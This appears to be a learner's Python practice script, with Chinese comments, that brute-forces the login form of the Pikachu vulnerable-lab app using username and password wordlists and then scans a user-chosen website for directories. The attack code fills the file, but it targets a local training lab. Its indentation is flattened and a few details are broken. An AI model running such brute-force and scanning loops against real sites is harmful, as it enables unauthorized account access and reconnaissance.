#嘗試使用python登錄pikachu爆破模塊
#發送post數據包，包含用戶名密碼，對接受到的響應進行判斷，如何為登錄成功
#爆破密碼
with open('passwor.txt','r') as f:
password=f.readlines()
for i in password:
data = {'username': 'admin', 'password': i, "submit": "Login"}
proxy = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
url = "http://192.168.10.128:806/vul/burteforce/bf_form.php"
r = requests.post(url=url, data=data, proxies=proxy)
r.encoding = "utf-8"
if "login success" in r.text:
print("登錄成功")
print("密碼：",i)
#既爆破密碼又爆破用戶名
#split('\n')[0]，基于\n進行字符串拆分，并取出第一位
with open('passwor.txt','r') as f:
password=f.readlines()
with open('user.txt','r') as p:
username=p.readlines()
for j in username:
for i in password:
data = {'username': j.split('\n')[0], 'password': i.split('\n')[0],
"submit": "Login"}
proxy = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
url = "http://192.168.10.128:806/vul/burteforce/bf_form.php"
r = requests.post(url=url, data=data, proxies=proxy)
r.encoding = "utf-8"
if "login success" in r.text:
print("登錄成功")
print("用戶名",j,"密碼：", i)
break
break
#如何目錄掃描
#基于requests發送數據包拼接url即可
#stat_code,200存在，403存在，404不存在
#如何目錄掃描,如何將掃出來的結果匯總成一個文件，txt格式即可，掃描的網站由自己定義
inurl=input("輸入要掃描的網站：\n")
resfile=inurl.split('://')[1]+'res.txt'
with open('PHP.txt','r') as f:
dic=f.readlines()
for i in dic:
url=inurl+i.split('\n')[0]
r=requests.head(url=url,proxies=proxy)
if r.status_code==200 or r.status_code==403:
with open(file=resfile,mode='a') as p:
p.write(i)
p.close()
print(i+'文件&目錄存在')
else:
pass
#看dirsearch的源碼